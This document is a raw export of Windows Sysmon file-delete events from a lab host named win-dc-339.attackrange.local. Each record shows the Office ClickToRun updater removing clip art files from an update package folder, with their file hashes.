14:55:08.205{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\FD00369_.WMFMD5=1E1FF845B0BF44DEDA341CE1145233EB,SHA256=BB40F7AC6A8A9D3023FCABF1A1C06C4E7363985AF8BAEF446F08C6007907F641,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065393Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.205{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\FD00361_.WMFMD5=B957FADAF809284C134B36F6D9B4C44A,SHA256=582713587071F49C2FA7B043B0B8BB9F6021E221F240067C89A26A3D699BEE38,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065392Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.205{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\FD00336_.WMFMD5=BBF4FC8018EF952896B561358561A0C0,SHA256=3C38545826C1588FA87F1F673C828604BE51847FE588D0368C46A4E8E26C45BE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065391Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.205{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\FD00306_.WMFMD5=281908487CF3B482129A63C0C5239DDA,SHA256=9333F9D01230EB73DAA6DD98106C4A661302B2281AF3E0A9E997197759232ABC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065390Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.205{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\FD00297_.WMFMD5=84A29F42611D348D853FE9EF51CB2E3E,SHA256=DF2A06874824F62491A769FEA97B8116A94121222DF1B9EF84BF55B8B6A3276E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065389Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.205{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\FD00296_.WMFMD5=7F1EFE3445AAB1EEF0950100E84C3BBA,SHA256=D1E9F9E59D78320D68998DD433524B7BAB95E3390EEC13625D08F66423E3F785,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065388Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.189{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\FD00096_.WMFMD5=7BDB2184E6AA70EA0A3A0F111754902D,SHA256=4BC278283C3C7E64E326D27BC071B5BFD6F6DF0CEA4C4B9A7567840D7F048EE5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065387Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.189{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\FD00090_.WMFMD5=02AD947AFE8E575D4A0FB7F919ED0EAC,SHA256=3749912D6A433809E694B981EEF31B83A797651C65488637C04F2E457B265DF9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065386Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.189{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\FD00086_.WMFMD5=3AC13C2A6E3C6B7AC4A59F1070566D97,SHA256=6768C990184E1DF58F22397958A712BC01A31566598BE690F6EAA6DA7FD0D524,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065385Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.189{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\FD00077_.WMFMD5=2A70035DA2452E85546DFAA0E4FCD639,SHA256=4421DB0EBD89B34250EBB37D969CE21C6142377FE33A30B924CCCDD4E875A724,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065384Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.189{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\FD00076_.WMFMD5=094E63064C55D9468E8FF9C80B1E6191,SHA256=D7A2D96DA4A9D9C7E6750502C76F07A09CE068BE3800B8A6A670FEB774D92054,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065383Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.189{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\FD00074_.WMFMD5=410B716CBAE1A339A9951B58922223E9,SHA256=C281800569489861D16F2FB1D3E2412BB4873CFAC7C00B0B3A6E14917EE13E41,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065382Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.189{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\FALL_01.MIDMD5=4DA7502FFA7CB919BA859B9C45E8BE0F,SHA256=09CD7122CF29DFB421FEFF77AD07134FF84700B856417C95E0BDB999BABAAE65,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065381Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.189{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\EXPLR_01.MIDMD5=2958046E6E642BB771BA766A7D832EAD,SHA256=03624CF7C6BB14EE384BED06BAF2E7CA7EFDD43F3B8C80777B838F3D32CA4A7B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065380Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.189{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\EN00902_.WMFMD5=3DDF18EE2B0AFC56CC2ADEF7A647633E,SHA256=018A675B79AB18EB7CA90E002A2540AFA3F1243D283CE1CD394FDF54FE6EFC1A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065379Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.189{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\EN00397_.WMFMD5=8C13C05A73E84858A75C71B439FB4013,SHA256=2BDB153FF02C5567653A11DC9B0DF506F0A2B17BBF36A8311AE86392E1A82F01,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065378Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.189{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\EN00320_.WMFMD5=A69EAEDE3384DE71EF138398F09ABCF6,SHA256=8DE46AD5231AB985D41BADAED62DC0697050390C4A74717693FEF7B1EE8DF62A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065377Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.189{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\EN00319_.WMFMD5=700E1EC6FDAE1DD15A5A417E413920E6,SHA256=71E829E3B4EF2E8092A4A996440D559CBAB7D4D6AC64D772CF30F3E349694695,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065376Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.189{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\EN00242_.WMFMD5=7A0FE79C3743421236C5729D8898EE34,SHA256=7799F6C8E171323B6271C72CBB6FFB0AEA37D5EF345D5FB20D297F6BDEB9DC9E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065375Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.189{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\EN00222_.WMFMD5=5EE2296F210BD35833EFA5FF1349BAED,SHA256=4E73471F0C0D2D208D1A26C24F2AB359CADC8B0EAED749B56262BF5EE99B54B0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065374Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.174{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\EN00202_.WMFMD5=CE60753DE104072598BC7328BA5E62E4,SHA256=21FCFF21BC4863DFA830F27E55202D2E7B24661066603C74405FF541AEC05C70,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065373Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.174{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\EN00006_.WMFMD5=CB230B897A2CE7B59CED83E77347CC31,SHA256=7CCF2647E7EA4A941A9EAFC1E9D9CC7F2C9629CBC34FB8CB6AD351CE30A768FB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065372Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.174{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\ED00184_.WMFMD5=EB40D79340396916F04C2DDB37F14897,SHA256=5D84A3266444A87B535B9C8B192B5D5580D3AF8EC01ED59641D0A3A9C3E2D633,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065371Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.174{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\ED00172_.WMFMD5=157E9EE096B5BEC1AEC532A363D05407,SHA256=B6BED86D4C79195BCB6A08AA759DC71CA1ABEEDF86C197C386B0EA7BB19BB8D0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065370Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.174{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\ED00019_.WMFMD5=55AC905602CAC55417009312E9B0357A,SHA256=D48C63858D7642439608051B31E042FFCA09AF00D275FBD31486728C126BBCE7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065369Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.174{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\ED00010_.WMFMD5=7EC3CE0F224BB5CF1A3622F495FCBD00,SHA256=A9CC955CE855C272842B5809DECFB5C00E2BD9F508226BAA7F186E510C859B24,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065368Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.174{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\EAST_01.MIDMD5=8D1EDFFA7C29D7E4540E0A14FDA328EB,SHA256=EA3928025362E3A7AD511E3179FA4DF59824A6F1E4A2C5F6D8C94C9272A2011B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065367Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.174{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\DD01793_.WMFMD5=0EB4B64E8378E0CD0B75B530820E029C,SHA256=FCE49FC8956A6CFD20CEE578C2A1386CFC96A5ED3D11065DBC2AF371EA07865D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065366Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.174{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\DD01772_.WMFMD5=2AB1CBBFA2CF80C641A23A5914ECEAC5,SHA256=08A0B743D1B07F590D271277E65BC3821AF8A529A469330BAB949EEE35448696,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065365Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.174{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\DD01761_.WMFMD5=4C271B513B9F9B15085AAB31B7A1E97C,SHA256=1EF80C3CF0711A8D382D627FB1D478999787B1564FFB5EF2180A9F17148C8D5F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065364Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.174{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\DD01631_.WMFMD5=B5715CE30507956C03DC1904ACC7389F,SHA256=F905FA16E36DE938420B87455508F3583A772124871D054ECDFA196526A3BED1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065363Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.174{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\DD01630_.WMFMD5=A49EBD16DD6A65B93AB2AD135434F541,SHA256=FB04094902572B2057E1BACDE7D4CB3534F1A142F0C3C92D3A0ACD52CC1C61B6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065362Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.174{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\DD01629_.WMFMD5=BC3E30E1629223A6D714BF35B5A3E12B,SHA256=BA6E75A116E3CD28ECDF335BD1C395168581F6635944BF6626A9E672E9CE5175,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065361Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.174{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\DD01628_.WMFMD5=42146B49D94FEC0CD9237F6453E5ABAE,SHA256=4BB61B208F21CBE84980EE586511DAF8D984C487ACF75F39E40C1F3376929C8E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065360Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.158{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\DD01586_.WMFMD5=6B11A79D775862FF4F08F354C1CF5630,SHA256=32DA3DA60CE67E0B9A7D030BFBE485BEA29FB223FAE332EB5F4454911680051E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065359Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.158{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\DD01585_.WMFMD5=DC7A2F58B86889B606D52BDC7A4EDAD7,SHA256=3EF557E2F095D31572D24C13E89C80ED139BF0742105FA45A36BD6AF94FC68A1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065358Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.158{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\DD01434_.WMFMD5=DBE9A1DF8D5E917716DE8D71152E5E00,SHA256=669CEA4E5CEEF6807A0DE6E63B74B0CEF95BCFA3A7E5CFDC0F3AAB87B459C9BF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065357Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.158{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\DD01366_.WMFMD5=36EFB85C42A507109567E394BE6A958F,SHA256=16669CE5527EE693A9B878D44A086649A457D51C1F88B4F98AE06545DC2CF0DE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065356Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.158{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\DD01186_.WMFMD5=5CEDC1D6BA17E5BC76230E47B418BC3A,SHA256=67E1ED2DA1B7FD26BA79368527F20F4BBA1D72174EBEE9814DE9FC9B58151A49,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065355Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.158{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\DD01183_.WMFMD5=337D1ED78977F9060E144527CC6046B5,SHA256=2B3B9820D0300A2AED32F031081FEFB0EEF9369112AEEC7670B2B0F0FAAC8628,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065354Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.158{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\DD01182_.WMFMD5=8B1C0C272BDF785B581A586D1D11A22A,SHA256=7D9ADA18D9274567F02BE738FD105B42CCF3F1FEA3AD2AAB679EE3A2A11EA180,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065353Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.158{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\DD01181_.WMFMD5=805840DADF6FB601381046AC937C5544,SHA256=4C63D236A6C327212F4B9A838A74429ABB1E949CBA5C7006DE48A5EF3350CA53,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065352Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.158{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\DD01180_.WMFMD5=3312807F70A1751FE705F004908636CB,SHA256=6F71103EAC4CBE2B8C200294CAFA1240797A452304F5670F7DC7A32E8C0CB16A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065351Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.158{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\DD01179_.WMFMD5=70C8E371EFDAF2975AB7F653242F73A7,SHA256=53DB0815FB2F25A808A4AC528F28FD32379DE73E8FBE3EB41F48A0D03E865F45,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065350Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.158{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\DD01178_.WMFMD5=373A9DA52116A476CDE87C1A0030D215,SHA256=D3ED28D9AB2D81DF8BB28F91B8705FADEBFE35738657FEA1454AE84BA8A1263B,IMPHASH=00000000000000000000000000000000falsetrue 